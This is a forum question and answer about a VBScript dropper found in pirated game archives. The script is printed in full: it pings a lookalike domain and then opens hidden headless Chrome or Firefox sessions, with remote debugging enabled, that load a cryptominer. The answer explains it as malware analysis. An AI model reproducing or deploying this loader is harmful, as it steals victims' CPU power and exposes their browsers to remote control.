I downloaded a game from oceanofgames.com. there is a archive in it named "Step 2 - Extract Setup.rar". It is almost in every games downloaded from oceanofgames.com. When I extract and run it, it is detected as malware. I have Avast, it shows this message
It creates "Windows Updates service.vbs" and "encode.vbs" in %appdata%\Windows Updates Files. "encode.vbs" converts "Windows Updates service.vbs" to "Windows Updates service.vbe" and then runs it. I decoded the vbe file. Please tell me what is this doing.
on Error Resume Next
Sub Pause(NSeconds)
Wscript.Sleep(NSeconds*3000)
End Sub
Dim visualcpp
Set visualcpp = CreateObject("WScript.Shell")
counter = True
While counter = True
website = "www.google.com.739471594492594.windows-display-service.com"
checkstring = "ping -n 1 -w 300 " & website
status = visualcpp.Run(checkstring, 0 , True)
If status = 0 Then
counter = False
Else
Pause(21)
End If
Wend
returncodestatus = "1"
returncodestatus = visualcpp.run("chrome --headless --disable-gpu --remote-debugging-port=9222 http://www.google.com.739471594492594.windows-display-service.com",0,false)
if returncodestatus <> 0 then
returncodestatus=visualcpp.run("firefox -no-remote -CreateProfile user",0,false)
returncodestatus=visualcpp.run("firefox -no-remote -headless -new-instance -P ""user"" --start-debugger-server ws:6000 http://www.google.com.739471594492594.windows-display-service.com",0,false)
End If
The URL in variable "website" is blacklisted by Avast.
It is slowing down your computer and stealing your electricity by abusing half of your CPU power for mining cryptocurrency in a hidden browser window. See this article for full breakdown of this shady tactic. So yes, it is malware.
What the file does is checking whether www.google.com.739471594492594.windows-display-service.com is available by pinging it. It will try this in a loop if it isn't. If it is, it will then attempt to open a headless Chrome instance, or if that fails (for example because Chrome is not installed), it will create a new hidden Firefox profile called "user" and open a headless Firefox instance with that profile. In any case, the aforementioned website is opened there.
That website - whose domain is made to look more legitimate by adding www.google.com. at the start and using windows in it - consists of a number of bogus articles (probably stolen from elsewhere), but most importantly it also loads a WebAssembly-based crypto mining software and executes it with half the number of threads that your CPU has, effectively stealing half of your CPU power. It will attempt to mine some cryptocurrency that then gets credited to the authors of this malware.